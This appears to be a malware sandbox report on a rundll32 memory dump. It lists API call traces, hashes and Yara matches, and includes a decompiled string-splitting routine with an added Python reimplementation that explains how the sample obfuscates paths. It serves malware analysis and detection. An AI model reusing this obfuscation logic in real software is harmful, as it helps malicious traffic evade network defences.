                            • API String ID: 1198164300-0
                            • Opcode ID: efa94c887583c71a92c185403d0e9654d9c582063a3c06e2ce602ccf9a079de0
                            • Instruction ID: d2f77ca7ec80a92bbb6b69f0d0e559d3130919ad48d105e7efc530acea6f746f
                            • Opcode Fuzzy Hash: efa94c887583c71a92c185403d0e9654d9c582063a3c06e2ce602ccf9a079de0
                            • Instruction Fuzzy Hash: 112174B6900209EFDB11DFA4C994ADEBBF8FF48304B1041A9E805E7260EB30EA05CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F62FB3
                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 04F62FF7
                            • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 04F6303A
                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 04F6305D
                              • Part of subcall function 04F7B9E9: GetTickCount.KERNEL32 ref: 04F7B9F9
                              • Part of subcall function 04F7B9E9: CreateFileW.KERNEL32(04F70971,80000000,00000003,04F8A1E8,00000003,00000000,00000000,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA16
                              • Part of subcall function 04F7B9E9: GetFileSize.KERNEL32(04F70971,00000000,?,00000001,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA49
                              • Part of subcall function 04F7B9E9: CreateFileMappingA.KERNEL32(04F70971,04F8A1E8,00000002,00000000,00000000,04F70971), ref: 04F7BA5D
                              • Part of subcall function 04F7B9E9: lstrlen.KERNEL32(04F70971,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BA79
                              • Part of subcall function 04F7B9E9: lstrcpy.KERNEL32(?,04F70971), ref: 04F7BA89
                              • Part of subcall function 04F7B9E9: HeapFree.KERNEL32(00000000,04F70971,?,04F70971,00000000,?,04F6C1F8,00000000), ref: 04F7BAA4
                              • Part of subcall function 04F7B9E9: CloseHandle.KERNEL32(04F70971,?,00000001,?,04F70971), ref: 04F7BAB6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                            • String ID:
                            • API String ID: 3239194699-0
                            • Opcode ID: 1d11a76d2a4fe5c4d6c10bbe858048cdd03a24d0c04fb479bf47c5d98830b2ce
                            • Instruction ID: 184e68efce970fd26b9a38c2e2f70db61f266abc3ded40ee4f323b1157524bb0
                            • Opcode Fuzzy Hash: 1d11a76d2a4fe5c4d6c10bbe858048cdd03a24d0c04fb479bf47c5d98830b2ce
                            • Instruction Fuzzy Hash: 11215A3190020DFBEB21DF65DD44DEEBBB8FF44358F14012AFA26961A0D735A91ACB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F8297E
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F82999
                            • GetLastError.KERNEL32 ref: 04F82A07
                            • GetLastError.KERNEL32 ref: 04F82A16
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalErrorLastSection$EnterLeave
                            • String ID:
                            • API String ID: 2124651672-0
                            • Opcode ID: 2f51803c16d3c929875bdc5f9ad5aafca537ab3b53079c1204cf007793cab428
                            • Instruction ID: 7ca90ffc73f8b30f2871f3bcae9d098ee172dba5987aafec9884535598c960f0
                            • Opcode Fuzzy Hash: 2f51803c16d3c929875bdc5f9ad5aafca537ab3b53079c1204cf007793cab428
                            • Instruction Fuzzy Hash: 18214D32900609EFCB11DF94D945AAE7BB4FF04720F11415DF816AA250D739FD129B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F6A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04F67D5E), ref: 04F6A6BE
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04F67D99
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04F6C556,?), ref: 04F67DAB
                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,04F6C556,?), ref: 04F67DC3
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,04F6C556,?), ref: 04F67DDE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleModuleNamePointerRead
                            • String ID:
                            • API String ID: 1352878660-0
                            • Opcode ID: e1a57fe475a5b81fae1b2dfad2484b4e50e1435f6d11a8542337850fba990af6
                            • Instruction ID: 4b74db49c401beccf2af382a6762d902a1f5f833e222552b6a4195bbf2d6c66e
                            • Opcode Fuzzy Hash: e1a57fe475a5b81fae1b2dfad2484b4e50e1435f6d11a8542337850fba990af6
                            • Instruction Fuzzy Hash: 24116071A01118BBEF21AE65DC88EFF7EACEF01758F104556F906E5090D775AA41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(?,00000000,761F8250,761B69A0,?,?,?,04F666C0,?,00000000,?), ref: 04F81CAB
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,04F666C0,?,00000000,?), ref: 04F81CCD
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F81CF9
                            • lstrcatW.KERNEL32(00000000,?), ref: 04F81D0C
                              • Part of subcall function 04F6B83F: strstr.NTDLL ref: 04F6B917
                              • Part of subcall function 04F6B83F: strstr.NTDLL ref: 04F6B96A
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 3712611166-0
                            • Opcode ID: 538e28c12286523dd46d583defea74b5db13b01e25088a44ef331fffb0bd6272
                            • Instruction ID: 0860e8c5609a93c6c8588d786c5dde2171132a660e8ed10a93264120b309ab51
                            • Opcode Fuzzy Hash: 538e28c12286523dd46d583defea74b5db13b01e25088a44ef331fffb0bd6272
                            • Instruction Fuzzy Hash: 4B114976900519BFDB11AFA5DD88DEF7FACEF09258B004569F9059B110E738EE02CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,?), ref: 04F6A28B
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F6A2A2
                            • StrChrA.SHLWAPI(00000000,0000002E), ref: 04F6A2AB
                            • GetModuleHandleA.KERNEL32(00000000), ref: 04F6A2C9
                              • Part of subcall function 04F68C35: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 04F68D0D
                              • Part of subcall function 04F68C35: VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,04F860B0,0000001C,04F7BE61), ref: 04F68D28
                              • Part of subcall function 04F68C35: RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F68D4D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                            • String ID:
                            • API String ID: 105881616-0
                            • Opcode ID: e672e2db084d25592165123cc6decdbc4051063e9ba176e5c5f90c75954dd850
                            • Instruction ID: 7cb4f9f1b80171bcf4e657588b741b8b10160d94d951f6ef617cfcd64d1f0171
                            • Opcode Fuzzy Hash: e672e2db084d25592165123cc6decdbc4051063e9ba176e5c5f90c75954dd850
                            • Instruction Fuzzy Hash: F9214F74E40309EFDB11DFA8C949AAEBBF8EF46304F108059E406AB250DB75E942DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04F81D62
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 04F81D86
                            • RegCloseKey.ADVAPI32(?), ref: 04F81DDE
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000), ref: 04F81DAF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: QueryValue$AllocateCloseHeapOpen
                            • String ID:
                            • API String ID: 453107315-0
                            • Opcode ID: b94ac548cc71945bea0b5645cd5344a6be00d36ffe8e0cb36223a3d3bbc07b35
                            • Instruction ID: 3b023706250e919a28938b500f6ea092a23bbefc0a79448696e695a01435eb97
                            • Opcode Fuzzy Hash: b94ac548cc71945bea0b5645cd5344a6be00d36ffe8e0cb36223a3d3bbc07b35
                            • Instruction Fuzzy Hash: F221D8B690010CFFDF11EF95DD84DEE7BB9EB88340F20855AE801AA210E771AA52DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F7EAA8,00000000,?,00000000,04F6E842,00000000,0631C310), ref: 04F62646
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F6265E
                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04F7EAA8,00000000,?,00000000,04F6E842,00000000,0631C310), ref: 04F626A2
                            • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 04F626C3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 1439742c54ed8c040afa0f3ae0069549075ea3d8c6bb46573850ee65de6963aa
                            • Instruction ID: a569fe08d98a68e5db8760eaa2681ffb2eda1e3d84dcf312097858ca7256e08f
                            • Opcode Fuzzy Hash: 1439742c54ed8c040afa0f3ae0069549075ea3d8c6bb46573850ee65de6963aa
                            • Instruction Fuzzy Hash: 3D112972E00219BFD7108E69EC84DAEBBEEDB81250B05417AF505DB140E7759E0587A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                             C-Code - Quality: 68%
                             // Decompiled from the PE-backed rundll32 dump at 04A10000 (see the APIs list below).
                             // Editorial comments: the routine copies an input string into a fresh heap buffer,
                             // splitting it into chunks of pseudo-random length (8 to min(24, remaining) - 1 bytes)
                             // separated by '/', with the lengths drawn from the 32-bit LCG state kept at 0x4a1a2f0.
                             			E04A14162(unsigned int __eax, void* __ecx) {
                             				void* _v8;
                             				void* _v12;
                             				signed int _t21;
                             				signed short _t23;
                             				char* _t27;
                             				void* _t29;
                             				void* _t30;
                             				unsigned int _t33;
                             				void* _t37;
                             				unsigned int _t38;
                             				void* _t41;
                             				void* _t42;
                             				int _t45;
                             				void* _t46;
                             
                             				_t42 = __eax;                          // input string
                             				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx); // lstrlen(input), ref 04A1416D in the APIs list
                             				_t38 = __eax;                          // bytes remaining to copy
                             				// len + len/8 + 1: room for at most one '/' per 8 input bytes plus the terminating NUL
                             				_t30 = RtlAllocateHeap( *0x4a1a2d8, 0, (__eax >> 3) + __eax + 1);
                             				_v12 = _t30;                           // returned buffer
                             				if(_t30 != 0) {
                             					_v8 = _t42;                        // read cursor into the input
                             					do {
                             						_t33 = 0x18;
                             						if(_t38 <= _t33) {
                             							_t33 = _t38;               // limit = min(24, remaining)
                             						}
                             						_t21 =  *0x4a1a2f0; // 0xba3a044c
                             						_t23 = 0x3c6ef35f + _t21 * 0x19660d; // LCG: state = state * 0x19660d + 0x3c6ef35f
                             						 *0x4a1a2f0 = _t23;                // state is persisted across calls
                             						// chunk = (state & 0xffff) % (limit - 8) + 8. As decompiled this is a do/while,
                             						// so the length check runs only after the first chunk: for an 8-byte input the
                             						// divisor is zero, for a shorter one it wraps as an unsigned value.
                             						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                             						memcpy(_t30, _v8, _t45);           // copy one chunk
                             						_v8 = _v8 + _t45;
                             						_t27 = _t30 + _t45;
                             						_t38 = _t38 - _t45;
                             						_t46 = _t46 + 0xc;                 // stack cleanup after the cdecl memcpy
                             						 *_t27 = 0x2f;                     // append '/'
                             						_t13 = _t27 + 1; // 0x1
                             						_t30 = _t13;                       // write cursor past the separator
                             					} while (_t38 > 8);
                             					memcpy(_t30, _v8, _t38 + 1);       // tail (1..8 bytes) plus terminating NUL, no separator
                             				}
                             				return _v12;
                             			}

                             • Instruction addresses of the decompiled lines above (one address per line in the original layout; the column alignment was lost in extraction): 0x04a1416a, 0x04a1416d, 0x04a14173, 0x04a1418b, 0x04a1418d, 0x04a14192, 0x04a14194, 0x04a14197, 0x04a14199, 0x04a1419c, 0x04a1419e, 0x04a1419e, 0x04a141a0, 0x04a141ab, 0x04a141b0, 0x04a141c1, 0x04a141c9, 0x04a141ce, 0x04a141d1, 0x04a141d4, 0x04a141d6, 0x04a141d9, 0x04a141dc, 0x04a141dc, 0x04a141df, 0x04a141ea, 0x04a141ef, 0x04a141f9

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04A11DC6,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A1416D
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04A14185
                            • memcpy.NTDLL(00000000,055395B0,-00000008,?,?,?,04A11DC6,00000000,?,746BC740,04A158D7,00000000,055395B0), ref: 04A141C9
                            • memcpy.NTDLL(00000001,055395B0,00000001,04A158D7,00000000,055395B0), ref: 04A141EA
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memcpy$AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 1819133394-0
                            • Opcode ID: 978430c92032837088e9af7dc39de2817d8e568dfe6ba7992ccea85126ac8bc7
                            • Instruction ID: cd99169743a8451e907927565ca43eabbb2309bba0910a36e274cafe03dde240
                            • Opcode Fuzzy Hash: 978430c92032837088e9af7dc39de2817d8e568dfe6ba7992ccea85126ac8bc7
                            • Instruction Fuzzy Hash: A31159B2A00214BFE7108F69DC84D9E7FEEEB943A0B050176F404CB160E7759E05C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%
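The following is an added analyst's reimplementation of the transform decompiled as E04A14162 above; it is not code from the sample or from the Joe Sandbox report. It reproduces the decompiled logic exactly (the 0x19660d / 0x3c6ef35f LCG, chunk lengths of 8 to min(24, remaining) - 1 bytes, a '/' after every chunk, and an unseparated 1..8 byte tail), checks that the (len >> 3) + len + 1 allocation always suffices, and provides the inverse so a captured path can be reduced back to the original string. Function and parameter names and the sample input are this example's own; the inverse is only lossless when the original contains no '/' byte, which the page does not state either way.

```python
"""Reimplementation of the string transform decompiled as E04A14162.

Added example, not code from the sample or the sandbox report. Names are
this example's own; the constants are the ones visible in the decompiled code.
"""
from typing import Tuple

LCG_MULT = 0x19660D       # multiplier in "_t21 * 0x19660d"
LCG_INC = 0x3C6EF35F      # increment in "0x3c6ef35f + ..."
MASK32 = 0xFFFFFFFF       # the state at *0x4a1a2f0 is a 32-bit value


def lcg_next(seed: int) -> int:
    """One step of the generator whose state the routine keeps at *0x4a1a2f0."""
    return (seed * LCG_MULT + LCG_INC) & MASK32


def alloc_size(length: int) -> int:
    """Buffer size the routine requests: RtlAllocateHeap(heap, 0, (len >> 3) + len + 1)."""
    return (length >> 3) + length + 1


def split_with_slashes(data: bytes, seed: int) -> Tuple[bytes, int]:
    """Return (transformed bytes, updated LCG state).

    Inputs of 8 bytes or fewer are rejected: the original is a do/while, so the
    first iteration uses (min(24, len) - 8) as a divisor before the length is
    checked, which is a divide-by-zero for len == 8 and a wrapped unsigned
    modulus for shorter inputs.
    """
    if len(data) <= 8:
        raise ValueError("input must be longer than 8 bytes")
    out = bytearray()
    pos = 0
    remaining = len(data)
    while True:                                  # do { ... } while (remaining > 8)
        limit = min(0x18, remaining)             # min(24, remaining)
        seed = lcg_next(seed)
        n = (seed & 0xFFFF) % (limit - 8) + 8    # 8 <= n <= limit - 1, so the tail is never empty
        out += data[pos:pos + n]                 # memcpy(dst, src, n)
        out.append(0x2F)                         # *dst = '/'
        pos += n
        remaining -= n
        if remaining <= 8:
            break
    out += data[pos:]                            # final memcpy of the tail (plus NUL in C)
    # Every chunk consumes at least 8 input bytes, so at most len // 8 separators
    # are inserted; with the NUL the output always fits the requested allocation.
    assert len(out) + 1 <= alloc_size(len(data))
    return bytes(out), seed


def strip_slashes(transformed: bytes) -> bytes:
    """Inverse of split_with_slashes; lossless only if the original had no '/' bytes."""
    return transformed.replace(b"/", b"")


if __name__ == "__main__":
    # Constructed sample input. 0xBA3A044C is the state value the decompiler
    # annotated on *0x4a1a2f0 in this dump, not a constant of the algorithm.
    sample = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    split, state = split_with_slashes(sample, 0xBA3A044C)
    print(split.decode())
    print("round trip ok:", strip_slashes(split) == sample)
```

With seed 0 the first generator output is 0x3c6ef35f, whose low 16 bits modulo 16 give 15, so the first chunk is 23 bytes long; later chunk lengths depend on the full 32-bit state, which is why the seed observed in a given dump matters when reproducing a specific captured path.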

                            APIs
                            • GlobalFix.KERNEL32(00000000), ref: 04F7223E
                            • memset.NTDLL ref: 04F72252
                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 04F7225F
                              • Part of subcall function 04F7C563: OpenProcess.KERNEL32(00000410,B8F475FF,04F72289,00000000,00000000,04F72289,0000001C,00000000,00000000,?,?,?,04F72289), ref: 04F7C5BD
                              • Part of subcall function 04F7C563: CloseHandle.KERNEL32(00000000,00000000,00000000,04F72299,00000104,?,?,?,04F72289), ref: 04F7C5DB
                              • Part of subcall function 04F7C563: GetSystemTimeAsFileTime.KERNEL32(04F72289), ref: 04F7C643
                            • GlobalUnWire.KERNEL32(00000000), ref: 04F7228A
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                            • String ID:
                            • API String ID: 3286078456-0
                            • Opcode ID: b86933e08e7c60a825dede94570072097c66d784748fcd724fb6777ac63cb608
                            • Instruction ID: 8bba6de4effe3075c7dc95182a6208b3238b17fc34534c05e62cfa5e574e311f
                            • Opcode Fuzzy Hash: b86933e08e7c60a825dede94570072097c66d784748fcd724fb6777ac63cb608
                            • Instruction Fuzzy Hash: 4E1177B6D00209ABDB119BB5EC48BBEB7BCEB08701F04415BE945F5240DB78D902CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,04F6AE46,00000000,00000000), ref: 04F81C3D
                            • GetLastError.KERNEL32(?,?,?,04F6AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,04F6EBC1,?,0000001E), ref: 04F81C45
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharErrorLastMultiWide
                            • String ID:
                            • API String ID: 203985260-0
                            • Opcode ID: 7d5782a9993608ce7441e4234443a44a0b0ffaf3434f414986ae21d7616ea3f7
                            • Instruction ID: e17e2f83908325e599ce83143fb4c171158c9f83a6b41bd9baa15ed5233b4b0c
                            • Opcode Fuzzy Hash: 7d5782a9993608ce7441e4234443a44a0b0ffaf3434f414986ae21d7616ea3f7
                            • Instruction Fuzzy Hash: B501D4326082557FC721BA769C4CCBBBB6CEBC7760B100B1DF8659A280D6206802C670
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,?,?,00000000,?,?,04F61D09,?,?,?,?,?,?,?,?,?), ref: 04F627F4
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • mbstowcs.NTDLL ref: 04F6280E
                            • lstrlen.KERNEL32(?), ref: 04F62819
                            • mbstowcs.NTDLL ref: 04F62833
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 04F7BB1D
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 04F7BB29
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BB71
                              • Part of subcall function 04F7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 04F7BB8C
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(0000002C), ref: 04F7BBC4
                              • Part of subcall function 04F7BAD1: lstrlenW.KERNEL32(?), ref: 04F7BBCC
                              • Part of subcall function 04F7BAD1: memset.NTDLL ref: 04F7BBEF
                              • Part of subcall function 04F7BAD1: wcscpy.NTDLL ref: 04F7BC01
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                            • String ID:
                            • API String ID: 1961997177-0
                            • Opcode ID: 1cf13c300fcce7b8e1042a64b25bc22ce52433d428d8c27eaf4342e362bdd353
                            • Instruction ID: 1507a46684d5ea4f55ba8bbc4dd7b4eb11327539bdba993f82e675c6e6474edb
                            • Opcode Fuzzy Hash: 1cf13c300fcce7b8e1042a64b25bc22ce52433d428d8c27eaf4342e362bdd353
                            • Instruction Fuzzy Hash: 0701B573900204B7EF11ABA5DC85F8F7BACDF84754F104467B515A7141EA79E91287A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04F70D10,?,00000000,00000000), ref: 04F7E04E
                            • lstrlen.KERNEL32(0631C178,?,04F70D10,?,00000000,00000000), ref: 04F7E06F
                            • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04F7E087
                            • lstrcpy.KERNEL32(00000000,0631C178), ref: 04F7E099
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                            • String ID:
                            • API String ID: 1929783139-0
                            • Opcode ID: 2e92660752d67dbedc8a557eb1d7e5dd6a1e45faf8b2874b4c338c6fb5283e82
                            • Instruction ID: b88725472abccce710380a12102de945cacb13e2aa0e4cf1f149ccb6a133be98
                            • Opcode Fuzzy Hash: 2e92660752d67dbedc8a557eb1d7e5dd6a1e45faf8b2874b4c338c6fb5283e82
                            • Instruction Fuzzy Hash: C3018876D00249FFD7119FA8AC44E6F7FBCEB49305F14416AE906D7241D638D905CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?), ref: 04F61B7E
                            • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 04F61BA4
                            • lstrcpy.KERNEL32(00000014,?), ref: 04F61BC9
                            • memcpy.NTDLL(?,?,?), ref: 04F61BD6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeaplstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 1388643974-0
                            • Opcode ID: 346fa67cddac6d1f6c06b8a314880c465812f1f4aaf78531d3e274096850e3ec
                            • Instruction ID: daa2e73012d80a1805cf759c82282610f42f616d57b156ce06dab244b8b0dfef
                            • Opcode Fuzzy Hash: 346fa67cddac6d1f6c06b8a314880c465812f1f4aaf78531d3e274096850e3ec
                            • Instruction Fuzzy Hash: 7D115B7190020AEFC721CF58E944E9ABBF8FF48704F14845EF85A9B210D775E905DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,76ECD3B0,?,761B5520,04F6B697,00000000,?,?,?,7620F710,00000000,00000000), ref: 04F79E17
                            • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 04F79E2F
                            • memcpy.NTDLL(0000000C,?,00000001), ref: 04F79E45
                              • Part of subcall function 04F6A8E9: StrChrA.SHLWAPI(00000020,?,76ECD3B0,0631C304,00000000,?,04F66584,?), ref: 04F6A90E
                              • Part of subcall function 04F6A8E9: StrTrimA.SHLWAPI(00000020,04F85FCC,00000000,?,04F66584,?), ref: 04F6A92D
                              • Part of subcall function 04F6A8E9: StrChrA.SHLWAPI(00000020,?,?,04F66584,?), ref: 04F6A939
                            • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 04F79E77
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                            • String ID:
                            • API String ID: 3208927540-0
                            • Opcode ID: cc9ba1e041a034a550982d6483dbc32b6d3670ca81aab1331b68f5c7bb105e86
                            • Instruction ID: ca1a7cac26a63ce3d601c02c530162beb78c6a3e7e76b6ced96401ca130f14e1
                            • Opcode Fuzzy Hash: cc9ba1e041a034a550982d6483dbc32b6d3670ca81aab1331b68f5c7bb105e86
                            • Instruction Fuzzy Hash: E8018472B00706ABF3215E52EC44F3B7BA8EB80B55F04402AF65999080D7B8AC1AA660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • RtlInitializeCriticalSection.NTDLL(04F8A400), ref: 04F75285
                            • RtlInitializeCriticalSection.NTDLL(04F8A3E0), ref: 04F7529B
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F752AC
                            • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F752E0
                              • Part of subcall function 04F768AC: GetModuleHandleA.KERNEL32(?,00000001,774B9EB0,00000000,?,?,?,?,00000000,04F752C3), ref: 04F768C4
                              • Part of subcall function 04F768AC: LoadLibraryA.KERNEL32(?), ref: 04F76965
                              • Part of subcall function 04F768AC: FreeLibrary.KERNEL32(00000000), ref: 04F76970
